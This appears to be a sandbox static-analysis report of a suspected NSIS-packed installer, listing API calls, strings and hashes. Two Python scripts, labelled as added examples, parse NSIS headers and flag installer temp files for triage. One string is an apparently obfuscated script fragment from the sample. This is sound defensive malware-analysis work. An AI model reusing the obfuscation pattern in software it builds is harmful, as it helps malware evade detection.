                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                        Strings
                                                                                        • Error launching installer, xrefs: 004035D7
                                                                                        • soft, xrefs: 00403675
                                                                                         • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author , xrefs: 004037C5
                                                                                        • Null, xrefs: 0040367E
                                                                                        • Inst, xrefs: 0040366C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                         • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author $Null$soft
                                                                                        • API String ID: 4283519449-527102705
                                                                                        • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                        • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                        • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                        • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
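The function at 00403587 above is the NSIS stub's header loader: the "Null", "soft" and "Inst" strings at 0040366C, 00403675 and 0040367E are the three dword constants NSIS compares against its firstheader signature (0xDEADBEEF followed by "NullsoftInst"), and the "Installer integrity check has failed" message is what it prints when the archive CRC does not match. The following script is an added example, not code from the report or from NSIS; it reproduces that locate-and-verify logic in Python using NSIS's published firstheader layout (flags, siginfo, nsinst[3], length_of_header, length_of_all_following_data, 28 bytes). The sample bytes it builds are constructed for the demonstration and are not the analysed file; the byte-level search is a superset of the stub's own scan, which only tests 512-byte-aligned positions, so the aligned flag is reported separately.

```python
"""Locate and validate an NSIS firstheader, mirroring the stub's check at 0x00403587.
Added example: layout follows NSIS fileform.h; sample data below is constructed."""
import struct
import sys
import zlib

# siginfo 0xDEADBEEF followed by nsinst[3] = "Null", "soft", "Inst" (little-endian dwords)
NSIS_MAGIC = b"\xef\xbe\xad\xdeNullsoftInst"
FIRSTHEADER_SIZE = 28          # flags, siginfo, nsinst[3], length_of_header, length_of_all_following_data
FH_FLAGS_MASK = 0x0F           # UNINSTALL=1, SILENT=2, NO_CRC=4, FORCE_CRC=8
FH_FLAGS_NO_CRC = 0x04


def find_nsis_firstheader(data):
    """Return (offset, header dict) for the first plausible NSIS firstheader, or None."""
    pos = 0
    while True:
        idx = data.find(NSIS_MAGIC, pos)
        if idx == -1:
            return None
        pos = idx + 1
        off = idx - 4                          # the flags dword precedes the magic
        if off < 0 or off + FIRSTHEADER_SIZE > len(data):
            continue
        flags, _sig, _n1, _n2, _n3, hdr_len, total_len = struct.unpack_from("<7I", data, off)
        # reject false positives: unknown flag bits, or a declared length that overruns the file
        if flags & ~FH_FLAGS_MASK:
            continue
        if total_len < FIRSTHEADER_SIZE + 4 or off + total_len > len(data):
            continue
        return off, {
            "flags": flags,
            "aligned": off % 512 == 0,         # the real stub only accepts 512-byte-aligned headers
            "length_of_header": hdr_len,
            "length_of_all_following_data": total_len,
        }


def verify_nsis_crc(data, off, hdr):
    """NSIS stores a CRC32 of everything before it in the last 4 bytes of the archive.

    Returns True/False, or None when the installer was built with CRCCheck off (NO_CRC flag);
    in that case the stub skips the check and never reports the integrity-check failure.
    """
    if hdr["flags"] & FH_FLAGS_NO_CRC:
        return None
    end = off + hdr["length_of_all_following_data"]
    stored = struct.unpack_from("<I", data, end - 4)[0]
    computed = zlib.crc32(data[:end - 4]) & 0xFFFFFFFF
    return stored == computed


def build_sample():
    """Constructed stand-in for an NSIS-wrapped executable (not the analysed file.exe)."""
    stub = b"MZ" + b"\x00" * 1022                       # placeholder for the stub's PE image
    datablock = b"\x5d\x00\x00\x80\x00" + b"A" * 200    # placeholder for the compressed datablock
    total = FIRSTHEADER_SIZE + len(datablock) + 4        # header + data + trailing CRC
    firstheader = struct.pack("<7I", 0, 0xDEADBEEF,
                              0x6C6C754E, 0x74666F73, 0x74736E49,   # "Null", "soft", "Inst"
                              len(datablock), total)
    body = stub + firstheader + datablock
    return body + struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)


def scan(data):
    """Convenience wrapper returning (offset, header, crc_ok) or None."""
    found = find_nsis_firstheader(data)
    if found is None:
        return None
    off, hdr = found
    return off, hdr, verify_nsis_crc(data, off, hdr)


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    result = scan(blob)
    if result is None:
        print("no NSIS firstheader found")
    else:
        off, hdr, ok = result
        print("NSIS firstheader at 0x%x flags=0x%x aligned=%s following_data=%d crc_ok=%s"
              % (off, hdr["flags"], hdr["aligned"], hdr["length_of_all_following_data"], ok))
```

Run it against a suspected NSIS-wrapped sample (`python nsis_header.py file.exe`); a header that is found but unaligned, or a CRC that does not verify, means the stub would refuse to run it, which is worth knowing before spending time on a static unpack of the datablock.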

                                                                                         Control-flow Graph
                                                                                         [rendered graph for the function at 0040337F not reproduced; its blocks call GetTickCount, MulDiv, wsprintfW and WriteFile; executed versus not-executed blocks are shown only in the interactive report]
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 004033E7
                                                                                        • GetTickCount.KERNEL32 ref: 00403464
                                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                        • wsprintfW.USER32 ref: 004034A4
                                                                                        • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                        • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                        Strings
                                                                                        • Set Illustrated=MRmAInclusion Www Tours Ev vTYECoastal Poker Hack Home Daughter Growth yIHRim Shoes Naughty Cove Shark Neural Buf EqChemicals Burner Jessica akNested Motorcycle Dome Mariah Qui Terrorist ytAssumes Summit QTJJExcerpt Blank Set Ar, xrefs: 004033A9
                                                                                        • X1C, xrefs: 0040343C
                                                                                        • ... %d%%, xrefs: 0040349E
                                                                                        • X1C, xrefs: 004033ED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountFileTickWrite$wsprintf
                                                                                        • String ID: ... %d%%$Set Illustrated=MRmAInclusion Www Tours Ev vTYECoastal Poker Hack Home Daughter Growth yIHRim Shoes Naughty Cove Shark Neural Buf EqChemicals Burner Jessica akNested Motorcycle Dome Mariah Qui Terrorist ytAssumes Summit QTJJExcerpt Blank Set Ar$X1C$X1C
                                                                                        • API String ID: 651206458-3597238433
                                                                                        • Opcode ID: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                                                                        • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                                        • Opcode Fuzzy Hash: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                                                                        • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                                                        Control-flow Graph (rendered as an image in the report; node/edge dump omitted): entry block 401eb9-401ec4; branches through calls to 406009 and 4062a3 (401ed5-401ee3, 401f2c-401f4e, 401ef7-402e50); GlobalAlloc at 401f53-401f7b followed by a call to 406805; GlobalFree at 402387-40238d; common exit block 4030e3-4030f2.
                                                                                        APIs
                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                        • GlobalFree.KERNELBASE(00581AD8), ref: 00402387
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeGloballstrcpyn
                                                                                        • String ID: Exch: stack < %d elements$MountainDecision$Pop: stack empty
                                                                                        • API String ID: 1459762280-3482557109
                                                                                        • Opcode ID: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                                                                        • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                                        • Opcode Fuzzy Hash: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                                                                        • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                                                        Control-flow Graph (rendered as an image in the report; node/edge dump omitted): 4022fd-402325 call 40145c, GetFileVersionInfoSizeW; 40232b-402339 GlobalAlloc; 40233f-40234e GetFileVersionInfoW; 402350-402367 VerQueryValueW; 402369-402381 two calls to 405f51; 402384-40238d GlobalFree; common exit block 4030e3-4030f2.
                                                                                        APIs
                                                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                        • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                        • GlobalFree.KERNELBASE(00581AD8), ref: 00402387
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3376005127-0
                                                                                        • Opcode ID: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                                                                        • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                        • Opcode Fuzzy Hash: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                                                                        • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                                                                        Control-flow Graph (rendered as an image in the report; node/edge dump omitted): 402b23-402b37 GlobalAlloc; 402b39-402b49 call 401446; 402b4b-402b6a call 40145c, WideCharToMultiByte, lstrlenA; 402b75-402b8d call 405f6a, WriteFile; 402384-40238d GlobalFree; common exit block 4030e3-4030f2.
                                                                                        APIs
                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                        • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                        • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 2568930968-0
                                                                                        • Opcode ID: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                                                                        • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                        • Opcode Fuzzy Hash: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                                                                        • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                                                                        Control-flow Graph (rendered as an image in the report; node/edge dump omitted): 402713-40273b two calls to 406009; three optional calls to 40145c (40273d-402743, 40274b-402752, 40275a-402761); 402764-40278c call 40145c, call 4062a3, WritePrivateProfileStringW.
                                                                                        APIs
                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileStringWritelstrcpyn
                                                                                        • String ID: <RM>$MountainDecision$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                        • API String ID: 247603264-1989267352
                                                                                        • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                        • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                                        • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                        • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                                                        Control-flow Graph (rendered as an image in the report; node/edge dump omitted): 4021b5-40220b four calls to 40145c, call 404f72, ShellExecuteW; error path 40220d-40221b call 4062a3; success path 402223-4030f2 call 4062a3 and exit.
                                                                                        APIs
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,00000000), ref: 00402202
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        Strings
                                                                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                        • API String ID: 3156913733-2180253247
                                                                                        • Opcode ID: 5eccbf476ddb8d8674987fe8ecfee4b51fb34cd29abaac0676283de9dc4e119a
                                                                                        • Instruction ID: f55d60da09602e729bbbaeb293de983d941832755293fd791e3a9c0dc2eb8546
                                                                                        • Opcode Fuzzy Hash: 5eccbf476ddb8d8674987fe8ecfee4b51fb34cd29abaac0676283de9dc4e119a
                                                                                        • Instruction Fuzzy Hash: 3B01A7B2B4021476D720B6B69C87F7B2A5CDB41764F20447BF542F50D3E5BD89409179

                                                                                        Control-flow Graph (rendered as an image in the report; node/edge dump omitted): 405e7f-405e8b entry; 405e8c-405ec0 GetTickCount, GetTempFileNameW; 405ec2-405ec4 retry loop back to 405e8c; 405ec6, 405ec9-405ecc and 405ecf-405ed1 exits.
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: CountFileNameTempTick
                                                                                        • String ID: nsa
                                                                                        • API String ID: 1716503409-2209301699
                                                                                        • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                        • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                        • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                        • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
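The function above pairs GetTickCount with GetTempFileNameW in a retry loop and carries the string "nsa"; other functions in this dump carry "NSIS Error", "WriteINIStr" and "ExecShell", so the stub matches the NSIS installer runtime. The Python below is an added example, not code from the report, from Joe Sandbox or from NSIS: it models how that temp-name prefix is derived and then matches the resulting names in a list of dropped-file paths, which is the check a triager runs to separate the installer's own scratch files from the payload it writes. The prefix derivation ("ns" plus a letter selected by GetTickCount() % 26) is taken from my reading of the NSIS stub source and is an assumption here; the sample paths are constructed.

```python
import re

# Constructed sample of dropped-file paths, in the form a sandbox report lists
# them. These are made-up paths, not taken from the report above.
SAMPLE_PATHS = [
    r"C:\Users\user\AppData\Local\Temp\nsh1B4C.tmp",
    r"C:\Users\user\AppData\Local\Temp\nsp3A2.tmp\System.dll",
    r"C:\Users\user\AppData\Local\Temp\nsa.tmp",
    r"C:\Users\user\AppData\Local\Temp\tmp1234.tmp",
    r"C:\Users\user\AppData\Local\Temp\nsA1234.tmp",
]

# GetTempFileNameW with uUnique == 0 builds <prefix, up to 3 chars><1-4 hex digits>.tmp.
# The NSIS prefix is "ns" followed by one letter a-z (see nsis_temp_prefix).
NSIS_TEMP_RE = re.compile(
    r"(?:^|\\)(ns[a-z][0-9a-f]{1,4}\.tmp)(?:\\|$)", re.IGNORECASE
)


def nsis_temp_prefix(tick_count: int) -> str:
    """Prefix handed to GetTempFileNameW for a given GetTickCount() value.

    Assumption (from the NSIS stub source, not from the report): the stub
    starts from "nsa" and adds GetTickCount() % 26 to the third character,
    which is why the loop in the function above re-reads the tick count on
    every retry.
    """
    return "ns" + chr(ord("a") + tick_count % 26)


def find_nsis_temp_artifacts(paths):
    """Return (path, tmp_name, kind) for each path holding an NSIS-style temp name.

    kind is "dir" when the .tmp name is used as a directory (NSIS keeps its
    plugin DLLs under such a directory) and "file" when it is the last component.
    """
    hits = []
    for path in paths:
        match = NSIS_TEMP_RE.search(path)
        if match is None:
            continue
        kind = "dir" if match.end() < len(path) else "file"
        hits.append((path, match.group(1), kind))
    return hits


if __name__ == "__main__":
    for tick in (0, 7, 26):
        print(f"GetTickCount()={tick:<3} -> prefix {nsis_temp_prefix(tick)}")
    for path, name, kind in find_nsis_temp_artifacts(SAMPLE_PATHS):
        print(f"{kind:4} {name:<12} {path}")
```

The regex deliberately requires at least one hex digit after the letter, so a bare "nsa.tmp" is not reported; GetTempFileNameW never produces that form when the unique argument is zero. Run the matcher over the report's dropped-file and file-activity lists to find the installer's scratch directory, then look at what was written into it.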

                                                                                        Control-flow Graph (rendered as an image in the report; node/edge dump omitted): entry 4078c5-4078cb, basic blocks spanning 407350-407cf6; the only API calls in the graph are GlobalFree (4073c2-4073c5, 40743a-40743d) and GlobalAlloc (4073cb-4073d9, 407443-407453).
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                        • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                        • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                        • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

                                                                                        Control-flow Graph

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                        • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                        • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                        • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                        • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                                        • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                        • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                        • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                                        • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                        • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
